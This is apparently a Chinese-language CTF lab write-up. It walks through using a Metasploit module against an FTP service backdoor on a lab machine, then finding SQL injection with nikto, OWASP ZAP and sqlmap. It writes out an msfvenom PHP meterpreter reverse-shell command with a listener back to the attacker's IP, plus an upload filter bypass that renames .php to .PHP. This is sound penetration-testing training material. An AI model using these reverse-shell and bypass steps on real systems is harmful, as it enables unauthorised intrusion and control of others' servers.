前言:CTF靶场系列的,这篇是好几次学习总结的。

实验

实验环境

攻击机:192.168.40.132
靶机:192.168.40.150
目的当然还是获取靶机的flag

直接跳过重复步骤

m0re
开放端口和版本信息知道了,开始搜索相应版本的服务是否存在已知漏洞
m0re
有后门存在的漏洞,先查看一下详细信息。kali中集成部分漏洞库还是比较全的,还方便查看。还可以找网站查询。我习惯用kali了。就没有留网站,现在也找不到了。

m0re
这个源代码需要修改进行利用,比如这个IP地址,需要修改为靶机的IP,对于新手还是有些难度的。
m0re
所以使用第二个,在metasploit中集成的模块进行利用。
m0re
后门利用,选择这个
查看并选择一个payload
m0re
设置好后,继续设置其他的参数,
然后开始攻击exploit
m0re
得到了root权限
优化shell终端也行,不优化也可以。
优化代码

python -c "import pty;pty.spawn('/bin/bash')"

奇怪的是,没有flag了,可能被删了。不纠结这个。
m0re
这个是利用FTP服务的后门,来进行攻击,使用metasploit集成的模块进行利用。

上面是这段时间学习的服务漏洞的一个总结。下面的是常见漏洞

SQL注入get参数

SQL注入的产生原因通常表现在以下几个方面:
①不当的类型处理
②不安全的数据库配置
③不合理的查询集处理
④不当的错误处理
⑤转义字符处理不合适
⑥多个提交处理不当

实验环境

攻击机:192.168.40.132
靶场机器:192.168.40.151

信息探测

扫描主机服务信息以及服务版本
m0re
更多信息进行探测
m0re
开启了http服务,可以尝试使用工具进行目录扫描查看敏感信息等操作

root@kali:~# nikto -host http://192.168.40.151
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.40.151
+ Target Hostname:    192.168.40.151
+ Target Port:        80
+ Start Time:         2020-07-29 19:56:42 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/2.2.16 (Debian)
+ Retrieved x-powered-by header: PHP/5.3.3-7+squeeze14
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.php
+ Apache/2.2.16 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ OSVDB-630: The web server may reveal its internal or real IP in the Location header via a request to /images over HTTP/1.0. The value is "127.0.0.1".
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ Cookie PHPSESSID created without the httponly flag
+ OSVDB-5034: /admin/login.php?action=insert&username=test&password=test: phpAuction may allow user admin accounts to be inserted without proper authentication. Attempt to log in with user 'test' password 'test' to verify.
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3268: /css/: Directory indexing found.
+ OSVDB-3092: /css/: This might be interesting...
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3268: /images/: Directory indexing found.
+ Server may leak inodes via ETags, header found with file /icons/README, inode: 3524, size: 5108, mtime: Tue Aug 28 18:48:10 2007
+ OSVDB-3233: /icons/README: Apache default file found.
+ /admin/login.php: Admin login page/section found.
+ 8727 requests: 0 error(s) and 22 item(s) reported on remote host
+ End Time:           2020-07-29 19:57:09 (GMT8) (27 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

可以查看到很多敏感信息,比如这里的PHP版本是5.3
还有一个web页面是/admin/login.php进行访问查看,进行深入挖掘
m0re
后台登录界面
先尝试弱口令,admin等常见弱口令进行尝试,但是没有成功。

漏洞扫描

web漏洞扫描器owasp-zap
是世界上最受欢迎的免费安全工具之一。zap可以帮助我们在开发和测试应用程序的过程中,自动发现web应用中的安全漏洞。另外,他也是一款提供给具备丰富经验的渗透测试人员进行人工安全测试的优秀工具。
m0re
选好后直接进行攻击
攻击完成后会自动跳转到这个界面,可以看到有SQL注入,和反射xss等漏洞。颜色不同,漏洞的危险等级也不同。
m0re
这里只进行查看SQL注入的漏洞。使用sqlmap进行探测。
m0re
使用sqlmap进行注入就是快很多,账号密码也得到了,可以进行登录了。
m0re

上传shell反弹权限

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.40.132 lport=4444 -f raw

然后保存生成的shell到桌面
启动监听

use exploit/multi/handler 
set payload php/meterpreter/reverse_tcp
set lhost 192.168.40.132
run

m0re
正在监听
上传shell执行shell
m0re
发现描述——不是PHP

  • 绕过过滤机制们利用.php修改为.PHP
    m0re
    成功了,查看侦听端口
    m0re
    完全没问题。
    使用shell,可以控制终端命令行
    然后尝试去到root目录找flag
    m0re
    发现权限不够,需要提权。
    不过这个只是进行SQL注入。提权再另说。

    总结

  1. 靶场机器如果存在SQL注入漏洞,可以利用sqlmap进行获取数据;
  2. 获得靶场机器shell后,可以分析是否需要提权。如果在当前权限下可以得到flag,那么就不需要提权;
  3. SQL注入往往要和上传漏洞配合,上传shell。